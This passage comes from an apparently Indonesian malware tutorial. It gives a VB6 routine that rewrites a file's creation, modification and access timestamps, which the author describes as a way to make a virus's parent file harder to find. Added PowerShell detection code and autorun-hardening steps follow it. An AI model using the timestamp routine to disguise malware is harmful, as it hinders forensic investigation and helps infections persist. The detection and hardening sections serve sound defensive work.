Public Type SYSTEMTIME
    wYear As Integer
    wMonth As Integer
    wDayOfWeek As Integer
    wDay As Integer
    wHour As Integer
    wMinute As Integer
    wSecond As Integer
    wMilliseconds As Integer
End Type

' Typed Optional parameters get their default here; IsMissing() only works on
' Variant parameters, so the original IsMissing checks never fired.
Public Sub ubahtanggal(pathfil As String, hari As Long, bulan As Long, tahun As Long, Optional creat As Boolean = False, Optional modif As Boolean = False, Optional acces As Boolean = False)
    On Error Resume Next
    Dim hfile As Long, rval As Long
    Dim buff As OFSTRUCT
    Dim ctime As FILETIME, latime As FILETIME, mtime As FILETIME
    Dim stime As SYSTEMTIME
    Dim fil As String
    hfile = OpenFile(pathfil, buff, OF_WRITE)
    ' OpenFile returns HFILE_ERROR (-1) on failure, which is truthy in VB
    If hfile <> -1 Then
        rval = GetFileTime(hfile, ctime, latime, mtime)
        If creat Then
            rval = FileTimeToLocalFileTime(ctime, ctime)
            rval = FileTimeToSystemTime(ctime, stime)
            stime.wYear = tahun
            stime.wMonth = bulan
            stime.wDay = hari
            stime.wHour = Hour(Time)
            stime.wMinute = Minute(Time)
            stime.wSecond = Second(Time)
            rval = SystemTimeToFileTime(stime, ctime)
            rval = LocalFileTimeToFileTime(ctime, ctime)
        End If
        If modif Then
            rval = FileTimeToLocalFileTime(mtime, mtime)
            rval = FileTimeToSystemTime(mtime, stime)
            stime.wYear = tahun
            stime.wMonth = bulan
            stime.wDay = hari
            stime.wHour = Hour(Time)
            stime.wMinute = Minute(Time)
            stime.wSecond = Second(Time)
            rval = SystemTimeToFileTime(stime, mtime)
            rval = LocalFileTimeToFileTime(mtime, mtime)
        End If
        If acces Then
            rval = FileTimeToLocalFileTime(latime, latime)
            rval = FileTimeToSystemTime(latime, stime)
            stime.wYear = tahun
            stime.wMonth = bulan
            stime.wDay = hari
            stime.wHour = Hour(Time)
            stime.wMinute = Minute(Time)
            stime.wSecond = Second(Time)
            rval = SystemTimeToFileTime(stime, latime)
            rval = LocalFileTimeToFileTime(latime, latime)
        End If
        rval = SetFileTime(hfile, ctime, latime, mtime)
        rval = CloseHandle(hfile)
    End If
End Sub
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------

The ubahtanggal procedure changes the date of the virus file, with the day, month and year parameters set to whatever we want. The creat, modif and acces parameters indicate which date or time is changed; for example, if acces is True and the others are False, only the access date and time are changed.

$> End...
Because of limited space and time I could only lay out 2 techniques that I think can be used to make it harder for the user to find a virus's parent file. I apologise if there are any shortcomings or statements that offend the reader.
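Seen from the defender's side, the two techniques above leave a contradiction a script can look for: the PE header carries the link time (the TimeDateStamp field of IMAGE_FILE_HEADER, declared in the 2nd Module), and no file can have been created or modified on disk before it was linked. The following PowerShell check is an added example for this page, not code from the article or its referenced authors; the function names Get-PeLinkTime and Test-PeTimestamps are mine.

```powershell
# Added example: compare a PE file's link time with its NTFS timestamps.
function Get-PeLinkTime {
    param([Parameter(Mandatory)][string]$Path)
    $b = [System.IO.File]::ReadAllBytes($Path)
    # DOS header: "MZ" magic; e_lfanew (offset of the PE signature) lives at 0x3C
    if ($b.Length -lt 0x40 -or $b[0] -ne 0x4D -or $b[1] -ne 0x5A) { return $null }
    $lfanew = [BitConverter]::ToInt32($b, 0x3C)
    if ($lfanew -lt 0x40 -or ($lfanew + 12) -gt $b.Length) { return $null }
    # "PE\0\0" signature, then IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    if ([BitConverter]::ToUInt32($b, $lfanew) -ne 0x00004550) { return $null }
    $stamp = [BitConverter]::ToUInt32($b, $lfanew + 8)
    if ($stamp -eq 0) { return $null }   # some linkers zero the field
    $epoch = New-Object DateTime -ArgumentList 1970,1,1,0,0,0,([DateTimeKind]::Utc)
    return $epoch.AddSeconds($stamp)
}

function Test-PeTimestamps {
    # Returns one object per file: link time, NTFS times and the flags raised.
    param([Parameter(Mandatory)][string]$Path, [int]$SkewDays = 1)
    $item = Get-Item -LiteralPath $Path
    $link = Get-PeLinkTime -Path $Path
    $flags = @()
    if ($null -ne $link) {
        # A binary cannot reach the disk before it was linked; allow a little clock skew.
        if ($item.CreationTimeUtc -lt $link.AddDays(-$SkewDays)) { $flags += 'CreationTime predates link time' }
        if ($item.LastWriteTimeUtc -lt $link.AddDays(-$SkewDays)) { $flags += 'LastWriteTime predates link time' }
        # A link time in the future points at a forged header rather than forged NTFS times.
        if ($link -gt (Get-Date).ToUniversalTime().AddDays($SkewDays)) { $flags += 'link time in the future' }
    }
    [pscustomobject]@{
        Path        = $item.FullName
        LinkTimeUtc = $link
        CreatedUtc  = $item.CreationTimeUtc
        ModifiedUtc = $item.LastWriteTimeUtc
        Flags       = ($flags -join '; ')
    }
}

# Usage: list executables under the profile whose NTFS times contradict the header.
Get-ChildItem -Path $env:USERPROFILE -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue |
    ForEach-Object { Test-PeTimestamps -Path $_.FullName } |
    Where-Object { $_.Flags } |
    Format-Table -AutoSize
```

Treat a hit as a lead rather than proof: reproducibly built binaries (including recent Microsoft system files) store a hash instead of a real link time in TimeDateStamp, so the field can look like nonsense on perfectly legitimate files.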
Disable autorun on all drives (to prevent virus autorun, for XP)

1. Click Start -> Run, type "gpedit.msc" without the quotes and click OK. Group Policy opens; go to Local Computer -> Computer Configuration -> Administrative Templates -> System, double-click Turn off Autoplay, set it to Enabled and change "CD-ROM drives" to "All drives".
2. Click User Configuration (look for it on the left), then Administrative Templates -> System, double-click Turn off Autoplay, set it to Enabled and change "CD-ROM drives" to "All drives".

Once that is done, no autorun will run at all, whether from a virus or from other drives, but the drives can still be used; likewise the virus will not run on its own. It only runs once you double-click it, hehehe.
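The two gpedit.msc steps above write one registry value each, so the same hardening can be applied and audited from PowerShell. This is an added example, not part of the original post; the function names Disable-AutorunAllDrives and Get-AutorunPolicyState are mine, and the HKLM half needs an elevated prompt.

```powershell
# Added example: registry equivalent of "Turn off Autoplay" = Enabled, "All drives".
$NoDriveTypeAutoRunAllDrives = 0xFF   # one bit per drive type; 0xFF covers every type

$PolicyKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'   # Computer Configuration half
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'   # User Configuration half
)

function Disable-AutorunAllDrives {
    # Creates the policy key if absent and sets the all-drives mask (needs admin for HKLM).
    foreach ($key in $PolicyKeys) {
        if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
        New-ItemProperty -Path $key -Name 'NoDriveTypeAutoRun' -PropertyType DWord `
            -Value $NoDriveTypeAutoRunAllDrives -Force | Out-Null
    }
}

function Get-AutorunPolicyState {
    # One object per policy key: the mask found and whether it equals the all-drives setting.
    foreach ($key in $PolicyKeys) {
        $value = (Get-ItemProperty -Path $key -Name 'NoDriveTypeAutoRun' -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
        $shown = if ($null -eq $value) { 'not configured' } else { '0x{0:X2}' -f $value }
        [pscustomobject]@{
            Key                = $key
            NoDriveTypeAutoRun = $shown
            AllDrivesDisabled  = ($value -eq $NoDriveTypeAutoRunAllDrives)
        }
    }
}

Disable-AutorunAllDrives
Get-AutorunPolicyState | Format-Table -AutoSize
```

A mask of 0xB5 is what the policy writes for its "CD-ROM and removable media drives" choice, so the audit distinguishes a partial setting from the all-drives one; on Windows XP the policy is only honoured completely once the update described in Microsoft KB967715 is installed.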